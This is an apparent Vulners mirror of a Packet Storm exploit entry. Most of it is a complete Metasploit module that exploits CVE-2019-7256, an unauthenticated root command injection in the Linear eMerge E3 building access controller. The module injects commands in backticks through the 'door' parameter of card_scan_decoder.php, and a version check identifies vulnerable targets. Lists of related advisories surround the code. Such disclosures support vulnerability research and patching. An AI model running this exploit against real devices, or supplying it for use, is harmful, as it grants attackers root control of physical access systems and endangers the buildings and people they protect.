Lucene search

K

Linear eMerge E3 Access Controller Command Injection

🗓️ 12 Nov 2019 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 178 Views

Linear eMerge E3 Access Controller Command Injection vulnerability. Unsantized exec() PHP function allows for arbitrary command execution with root privileges.

Show more
Related
Code
ReporterTitlePublishedViews
Family
exploitpack
Linear eMerge E3 1.00-06 - Remote Code Execution
13 Nov 201900:00
exploitpack
exploitpack
eMerge E3 1.00-06 - Remote Code Execution
12 Nov 201900:00
exploitpack
Exploit DB
Linear eMerge E3 1.00-06 - Remote Code Execution
13 Nov 201900:00
exploitdb
Exploit DB
eMerge E3 1.00-06 - Remote Code Execution
12 Nov 201900:00
exploitdb
Exploit DB
eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)
12 Nov 201900:00
exploitdb
Prion
Command injection
2 Jul 201919:15
prion
Prion
Design/Logic Flaw
25 Aug 202223:15
prion
CVE
CVE-2019-7256
2 Jul 201919:15
cve
CVE
CVE-2022-31499
25 Aug 202223:15
cve
Tenable Nessus
Linear eMerge Code RCE (CVE-2019-7256)
29 Mar 202400:00
nessus
Rows per page
`#  
# Nortek Linear eMerge E3 Unauthenticated Remote Root Code Execution (Metasploit)  
# by Gjoko 'LiquidWorm' Krstic  
# Affected version: <=1.00-06  
# Advisory: https://applied-risk.com/resources/ar-2019-005  
# Tested on: GNU/Linux 3.14.54 (ARMv7 rev 10), Lighttpd 1.4.40, PHP/5.6.23  
#  
  
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Linear eMerge E3 Access Controller Command Injection',  
'Description' => %q{  
This module exploits a command injection vulnerability in the Linear eMerge  
E3 Access Controller. The issue is triggered by an unsanitized exec() PHP  
function allowing arbitrary command execution with root privileges.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Gjoko Krstic <[email protected]> ' # Discovery, Exploit, MSF Module  
],  
'References' =>  
[  
[ 'URL', 'https://applied-risk.com/labs/advisories' ],  
[ 'URL', 'https://www.nortekcontrol.com' ],  
[ 'CVE', '2019-7256']  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true,  
},  
'Platform' => [ 'unix' ],  
'Arch' => ARCH_CMD,  
'Targets' => [ ['Linear eMerge E3', { }], ],  
'DisclosureDate' => "Oct 29 2019",  
'DefaultTarget' => 0  
)  
)  
end  
  
def check  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path.to_s, "card_scan_decoder.php"),  
'vars_get' =>  
{  
'No' => '251',  
'door' => '1337'  
}  
})  
if res.code == 200 and res.to_s =~ /PHP\/5.6.23/  
return Exploit::CheckCode::Vulnerable  
end  
return Exploit::CheckCode::Safe  
end  
  
def http_send_command(cmd)  
uri = normalize_uri(target_uri.path.to_s, "card_scan_decoder.php")  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => uri,  
'vars_get' =>  
{  
'No' => '251',  
'door' => "`"+cmd+"`"  
}  
})  
unless res  
fail_with(Failure::Unknown, 'Exploit failed!')  
end  
res  
end  
  
def exploit  
http_send_command(payload.encoded)  
print_status("Sending #{payload.encoded.length} byte payload...")  
end  
end  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo